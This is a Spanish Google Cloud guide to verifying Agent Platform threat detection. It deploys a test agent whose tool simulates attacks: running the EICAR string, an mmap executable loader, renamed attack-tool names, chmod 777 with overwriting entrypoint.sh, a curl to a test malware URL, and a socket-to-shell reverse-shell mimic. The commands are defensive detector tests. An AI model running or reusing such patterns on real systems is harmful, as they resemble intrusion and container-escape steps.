En esta página, se explica cómo verificar que la detección de amenazas a Agent Platform funcione. Para ello, activa de forma intencional los detectores y verifica los resultados. La detección de amenazas a Agent Platform es un servicio integrado de Security Command Center.
Antes de comenzar
Para detectar posibles amenazas a tus agentes de Agent Runtime, asegúrate de que el servicio de detección de amenazas de Agent Platform esté habilitado en Security Command Center.
Configura el entorno
Para probar la Detección de amenazas de Agent Platform, configura un agente de demostración que simule actividad maliciosa.
Crea un proyecto y activa la shell
Selecciona o crea un proyecto de Google Cloud para usarlo en las pruebas.
Para probar los detectores, puedes usar la consola de Google Cloud y Cloud Shell.
Ve a la consola deGoogle Cloud .
Selecciona el proyecto que usarás para realizar las pruebas.
Haz clic en Activate Cloud Shell (Activar Cloud Shell).
También puedes ejecutar las instrucciones de prueba desde una shell local.
Configura Agent Runtime
Si nunca usaste Agent Runtime en este proyecto, configura el entorno de Agent Runtime antes de comenzar. Registra el nombre del bucket de Cloud Storage de etapa de pruebas que creaste. También te recomendamos que sigas la guía de inicio rápido de Agent Runtime para aprender a desarrollar e implementar un agente con el SDK de Vertex AI.
Crea un script de prueba
Crearás varios archivos que se usarán para implementar un agente nuevo para las pruebas. Para ello, usa un editor de texto, como nano.
Crea un nuevo archivo llamado
requirements.txtcon el siguiente contenido.google-cloud-aiplatform[agent_engines] google-adk google-genai aiohttp cloudpickle pydanticCrea un archivo vacío nuevo llamado
installation_scripts/install.sh. Algunas pruebas requieren que se agregue contenido a este archivo.Crea un nuevo archivo llamado
main.pycon el siguiente contenido. Reemplaza las variablesPROJECT_ID,LOCATIONySTAGING_BUCKET. El nombre del bucket de etapa de pruebas debe incluir el prefijogs://.import asyncio import os import subprocess import socket import vertexai from vertexai import Client, agent_engines from google.adk.agents import llm_agent from google.adk.sessions.in_memory_session_service import InMemorySessionService # Replace with your own project, location, and staging bucket. LOCATION = "LOCATION" PROJECT_ID = "PROJECT_ID" # Staging bucket must have gs:// prefix STAGING_BUCKET = "STAGING_BUCKET" client = Client(project=PROJECT_ID, location=LOCATION) def _run_command(args, **kwargs): output = f"Called {' '.join(args)}\n" try: res = subprocess.run(args, capture_output=True, text=True, **kwargs) if res.stdout: output += f"Result: {res.stdout.strip()}\n" if res.stderr: output += f"Error: {res.stderr.strip()}\n" except subprocess.TimeoutExpired: output += "Command timed out as expected." return output # Tool to simulate threats. The function body will be replaced for individual # detector tests. def threat_detection_test(): output = _run_command(["sleep", "60"]) output += _run_command(["echo", "this is a fake threat"]) output += _run_command(["sleep", "10"]) return output root_agent = llm_agent.Agent( model="gemini-2.5-flash", name="threat_detection_test_agent", description="Runs threat detection test.", instruction=""" You are an agent that runs a threat detection test using a fake malicious command. """, tools=[threat_detection_test], ) async def main(): vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) app = agent_engines.AdkApp( agent=root_agent, session_service_builder=InMemorySessionService ) remote_agent = client.agent_engines.create( agent=app, config={ "display_name": "scc_threat_test_agent", "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY, "requirements": [ "google-cloud-aiplatform[agent_engines,adk]", "cloudpickle", "pydantic", ], "staging_bucket": STAGING_BUCKET, "extra_packages": [ "installation_scripts/install.sh", ], }, ) print("Deployed agent: ", remote_agent.api_resource.name) try: async for event in remote_agent.async_stream_query( user_id="threat_detection_tester", message="Run the threat detection test", ): print(event) finally: client.agent_engines.delete(name=remote_agent.api_resource.name, force=True) if __name__ == "__main__": asyncio.run(main())
Configura el entorno virtual
Crea y activa un entorno virtual de Python.
python3 -m venv env source env/bin/activateInstala las dependencias necesarias en el entorno virtual.
pip install -r requirements.txt
Prueba la secuencia de comandos
Ejecuta la secuencia de comandos desde el entorno virtual con python3 main.py.
Este comando tardará varios minutos en compilar, implementar y ejecutar el agente de prueba.
La secuencia de comandos genera el nombre del recurso del agente implementado y algunos objetos JSON, incluida una respuesta del LLM y otros metadatos. Si encuentras errores de permisos o de implementación en esta etapa, consulta la sección de solución de problemas para conocer los próximos pasos.
Detectores de prueba
Para probar los detectores de detección de amenazas de Agent Platform, reemplaza el código en la función threat_detection_test por código que simule un ataque. La secuencia de comandos puede tardar mucho en implementar el agente y consultarlo. Para acelerar las pruebas, puedes combinar el contenido de varias de estas funciones.
Ejecución: Se ejecutó un objeto binario malicioso agregado
Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output += _run_command(["touch", "/tmp/test_mal_file"])
with open("/tmp/test_mal_file", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
output += _run_command(["sleep", "10"])
return output
Ejecución: Se cargó una biblioteca maliciosa agregada
Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba. Es posible que recibas un error del SDK de Vertex AI sobre el análisis de la respuesta, pero el hallazgo se generará de todos modos.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
with open("/tmp/test_mal_lib", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
output += _run_command(["sleep", "10"])
return output
Ejecución: Escape del contenedor
Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
output += _run_command(["sleep", "10"])
return output
Ejecución: Se detectó la ejecución de la herramienta de ataque de Kubernetes
Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
output += _run_command(["/tmp/amicontained"])
output += _run_command(["sleep", "10"])
return output
Ejecución: Se detectó la ejecución de la herramienta de reconocimiento local
Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
output += _run_command(["/tmp/linenum.sh"])
output += _run_command(["sleep", "10"])
return output
Ejecución: Se ejecutó un objeto binario malicioso modificado
Replace the `threat_detection_test` function in the test script, and then run the
test script.
```python
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```
Ejecución: Se cargó una biblioteca maliciosa modificada
Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
output += _run_command(["sleep", "10"])
return output
Se detectó una URL maliciosa
Actualiza el archivo installation_scripts/install.sh con el siguiente contenido.
#!/bin/bash
apt-get install -y curl --no-install-recommends
Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.
def threat_detection_test():
url = "https://testsafebrowsing.appspot.com/s/malware.html"
output = _run_command(["sleep", "60"])
output += _run_command(["curl", url])
output += _run_command(["sleep", "10"])
return output
Shells inversas
Reemplaza la función threat_detection_test en la secuencia de comandos de prueba y, luego, ejecuta la secuencia de comandos de prueba.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("8.8.8.8", 53))
subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
output += _run_command(["sleep", "10"])
return output
¿Qué sigue?
- Obtén más información sobre la Detección de amenazas a Agent Platform.
- Obtén más información para usar la detección de amenazas a Agent Platform.